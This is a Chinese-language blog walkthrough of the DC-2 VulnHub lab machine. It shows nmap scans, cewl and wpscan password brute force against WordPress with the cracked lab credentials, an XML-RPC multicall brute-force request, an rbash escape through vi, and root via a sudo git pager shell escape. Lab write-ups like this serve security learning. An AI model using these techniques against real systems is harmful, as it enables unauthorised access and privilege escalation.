DC-2靶机
DC-2
靶机IP:192.168.43.197(arp-scan l) 攻击机器IP:192.168.43.199
在hosts文件里添加:192.168.43.197 dc-2 #把ip换成自己的
0X1:信息收集
nmap:
⚡ root@roots /work/DC/DC-2 nmap -A 192.168.43.197
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-13 14:08 CST
Nmap scan report for DC-2 (192.168.43.197)
Host is up (0.00032s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
| http-title: DC-2 – Just another WordPress site
|_Requested resource was http://dc-2/
MAC Address: 08:00:27:36:54:53 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms DC-2 (192.168.43.197)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds
访问一下,发现页面是Wordpress,并且发现有一个flag的提示
flag1
#http://dc-2/index.php/flag/
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
提示我们使用 cewl 收集页面信息,生成密码,用于登录(爆破)
cewl:
cewl dc-2 -w dict.txt
⚡ root@roots /work/DC/DC-2 cewl dc-2 -w dict.txt
CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
⚡ root@roots /work/DC/DC-2 cat dict.txt
sit
amet
nec
quis
vel
...............
wpscan:
##wpscan --url dc-2 默认扫描
##wpscan --url dc-2 -eu 扫描用户名 (手工探测 http://dc-2/?author=1 2 3 4 5 6 ....)
⚡ root@roots /work/DC/DC-2 wpscan --url dc-2
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.4.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://dc-2/
[+] Started: Tue Aug 13 14:19:38 2019
Interesting Finding(s):
[+] http://dc-2/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Detected By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
|
| [!] 10 vulnerabilities identified:
|
| [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
| Fixed in: 4.7.11
| References:
| - https://wpvulndb.com/vulnerabilities/9100
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
| - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
| - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
| - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
| - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
| - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
|
| [!] Title: WordPress <= 5.0 - Authenticated File Delete
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9169
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9170
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
|
| [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9171
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9172
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9173
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
|
| [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9174
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9175
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
|
| [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
| Fixed in: 5.0.1
| References:
| - https://wpvulndb.com/vulnerabilities/9222
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
| - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
| - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
|
| [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
| Fixed in: 4.7.13
| References:
| - https://wpvulndb.com/vulnerabilities/9230
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
| - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
| - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
| - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==========================================> (21 / 21) 100.00% Time: 00:00:00
[+] admin
| Detected By: Rss Generator (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jerry
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Finished: Tue Aug 13 14:42:00 2019
[+] Requests Done: 21
[+] Cached Requests: 35
[+] Data Sent: 4.394 KB
[+] Data Received: 520.309 KB
[+] Memory used: 2.758 MB
[+] Elapsed time: 00:00:05
我们可以得到wordpress的版本信息,以及CVE,不过打靶机通过CVE没啥意思,按照作者的思路爆破
发现三个用户名 admin tom jerry
wpscan_爆破:
1. wpscan --url dc-2 -P dict.txt
#得到结果
[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
2.使用hydra爆破
3.使用XMLRPC:
用户名密码:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
11
3.使用XMLRPC:
burp包:
POST /xmlrpc.php HTTP/1.1
Host: dc-2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 910
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>system.multicall</methodName>
<params><param>
<value><array><data>
<value><struct>
<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data>
<value><string>jerry</string></value>
<value><string>adipiscing</string></value>
</data></array></value></member>
</struct></value>
<value><struct>
<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data>
<value><string>guest</string></value>
<value><string>test</string></value>
</data></array></value></member>
</struct></value>
</data></array></value>
</param></params>
</methodCall>
Get_shell:
登录jerry之后,发现flag2
flag2
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
说利用wordpress走捷径,我想到了CVE,先不用CVE自己再想想毕竟拿过来一个脚本跑跑没啥意思
再次nmap:
自己习惯第一次nmap -A 简单探测一下,现在我们全面测试一下
⚡ root@roots /work/DC/DC-2 nmap -sT -p- -A dc-2
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-13 16:04 CST
Nmap scan report for dc-2 (192.168.43.197)
Host is up (0.00043s latency).
rDNS record for 192.168.43.197: DC-2
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:36:54:53 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms DC-2 (192.168.43.197)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.28 seconds
有新的收获,发现ssh端口7744,尝试登录下,测试出来用tom
登录:
✘ ⚡ root@roots ~ ssh tom@192.168.43.197 -p7744
The authenticity of host '[192.168.43.197]:7744 ([192.168.43.197]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.43.197]:7744' (ECDSA) to the list of known hosts.
tom@192.168.43.197's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt usr
发现flag3.txt 很无语 cat id 等很多命令都不能用 是一个什么rbash,但是比较心急的我,用vim试试了得到flag3.txt
flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
#大概就是让我们切换到jerry
rabsh:
执行一下一些命令得到报错,根据报错搜索了解 rbash 吧 没办法
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ id
-rbash: id: command not found
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
#新建一个vi shell.txt 在里边输入
: set shell =/bin/sh
:shell
#就可以了
11
得到sh权限
/bin/sh: 2: cat: not found
$ whoami
/bin/sh: 3: whoami: not found
$ export
export HOME='/home/tom'
export LANG='en_US.UTF-8'
export LC_CTYPE='zh_CN.UTF-8'
export LOGNAME='tom'
export MAIL='/var/mail/tom'
export PATH='/home/tom/usr/bin'
export PWD='/home/tom'
export SHELL='/bin/rbash'
export SHLVL='1'
export SSH_CLIENT='192.168.43.199 37218 7744'
export SSH_CONNECTION='192.168.43.199 37218 192.168.43.197 7744'
export SSH_TTY='/dev/pts/0'
export TERM='xterm'
export USER='tom'
export VIM='/usr/share/vim'
export VIMRUNTIME='/usr/share/vim/vim74'
export _='whoami'
改变一下环境变量
$ export PATH=/usr/sbin:/usr/bin:/sbin:/bin
$ id
uid=1001(tom) gid=1001(tom) groups=1001(tom)
#所有命令均可以正常使用切换到jerry
Password:
jerry@DC-2:/etc$ id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry)
jerry@DC-2:/etc$ cd ~
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
flag4:
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
提权:
大概的思路都尝试一下,这次没想到竟然在history中得到收获
jerry@DC-2:/var/www/html$ history
1 cd
2 rm .bash_history
3 exit
4 cd
5 pwd
6 ls
7 id
8 pwd
9 vi flag4.txt
10 ls
11 sudo git
12 sudo git help
13 sudo git help status
jerry@DC-2:/var/www/html$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
通过学习大佬的wp可以这样
sudo git -p help config
!/bin/sh
sudo git -p help config
jerry@DC-2:/var/www/html$ sudo git -h
Unknown option: -h
usage: git [--version] [--help] [-C <path>] [-c name=value]
[--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
[-p|--paginate|--no-pager] [--no-replace-objects] [--bare]
[--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
<command> [<args>]
jerry@DC-2:/var/www/html$ sudo git -p help config
man: can't set the locale; make sure $LC_* and $LANG are correct
GIT-CONFIG(1) Git Manual GIT-CONFIG(1)
NAME
git-config - Get and set repository or global options
SYNOPSIS
git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
git config [<file-option>] [type] --add name value
git config [<file-option>] [type] --replace-all name value [value_regex]
git config [<file-option>] [type] [-z|--null] --get name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-all name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-regexp name_regex [value_regex]
git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
git config [<file-option>] --unset name [value_regex]
git config [<file-option>] --unset-all name [value_regex]
git config [<file-option>] --rename-section old_name new_name
git config [<file-option>] --remove-section name
git config [<file-option>] [-z|--null] -l | --list
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
final-flag.txt
# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
总结:
这个靶机rbash 和git提权比较有趣,其他中规中矩。
通过这个靶机学习到了wordpress的爆破 还可以使用 XMLPRC在被限制的情况下或者不想留下太多痕迹
git的好像是个缓冲区漏洞,还没来得及了解
学习:
cewl : https://www.4hou.com/tools/14693.html
XMLRPC:
1.https://blog.knownsec.com/2015/10/wordpress-xmlrpc-brute-force-amplification-attack-analysis/
2.http://mtfly.net/179
nmap: https://www.cnblogs.com/Vinson404/p/7784829.html
rbash:
1.https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
2.https://www.anquanke.com/post/id/173159
git提权:https://gtfobins.github.io/gtfobins/git/
DC-2靶机的更多相关文章
- DC 1-3 靶机渗透
DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...
- Vulnhub DC-9靶机渗透
信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.147 #扫描端口等信息 22端口过滤,80端口开放,同样的从80端口入手. 不是现成 ...
- vulnhub-DC:2靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...
- vulnhub-DC:1靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...
- vulnhub-DC:3靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/ 导入到vmware 导入的时候遇到一个问题 解决方法: 点 "虚拟机" ...
- vulnhub-DC:4靶机渗透记录
准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...
- vulnhub-DC:5靶机渗透记录
准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-DC:6靶机渗透记录
准备工作 在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-DC:7靶机渗透记录
准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...
- DC-1 靶机渗透测试
DC-1靶机渗透测试 对着镜子大喊三声"太菜了""太菜了""太菜了" DC系列靶机的第一篇.边学习边日靶机边进步,摸爬滚打着前行. 内容不只 ...
随机推荐
- 通过字节码分析java中的switch语句
在一次做题中遇到了switch的问题,由于对switch执行顺序的不了解,在这里简单的通过字节码的方式理解一下switch执行顺序(题目如下): public class Ag{ static pub ...
- JAVA面试题 启动线程是start()还是run()?为什么?
面试官:请问启动线程是start()还是run()方法,能谈谈吗? 应聘者:start()方法 当用start()开始一个线程后,线程就进入就绪状态,使线程所代表的虚拟处理机处于可运行状态,这意味着它 ...
- bzoj 1082: [SCOI2005]栅栏 题解
1082: [SCOI2005]栅栏 Time Limit: 10 Sec Memory Limit: 162 MBSubmit: 2340 Solved: 991[Submit][Status] ...
- 教你用Python制作微信好友背景墙
目录: 0 引言 1 环境 2 代码实现 3 后记 0 引言 前段时间,微信朋友圈开始出现了一种晒照片新形式,微信好友墙,即在一张大图片中展示出自己的所有微信好友的头像. 效果如下图,出于隐私考虑,这 ...
- Java读写二进制数据
import java.io.*; import java.time.LocalDate; public class Test { public static void main(String[] a ...
- 快速掌握mongoDB(四)—— C#驱动MongoDB用法演示
前边我们已经使用mongo shell进行增删查改和聚合操作,这一篇简单介绍如何使用C#驱动MongoDB.C#驱动MongoDB的本质是将C#的操作代码转换为mongo shell,驱动的API也比 ...
- MFC开发--截图工具
近期学习了MFC的相关知识,MFC(Microsoft Foundation Classes)是微软公司提供的一个类库,可以这样简单理解,就是对于Win32的封装(MFC对windows API函数的 ...
- 【SpringCloud】Ribbon如何自定义客户端配置和全局配置
起因 事情的起因是这样的,公司内部要实现基于Zuul网关的灰度路由,在上线时进行灰度测试,故需要配置业务微服务向Eureka注册的metadata元数据,和自定义Ribbon的负载规则达到只访问灰度服 ...
- 「Sqlserver」数据分析师有理由爱Sqlserver之一-好用的插件工具推荐
在此系列中,笔者为大家带来一些以数据分析师视角去使用Sqlserver的系列文章,希望笔者走过的路能够给后来者带来一些便利. 背景介绍 在数据分析师的角色下,使用数据库更多的是为了从数据库中获取数据, ...
- 安卓BindService笔记
1 前言 最近学习到了安卓的service,记录一下自己对BindService的理解,学习教程以及部分代码来自菜鸟教程的android教程:菜鸟教程安卓端BindService链接 2 正文 先贴一 ...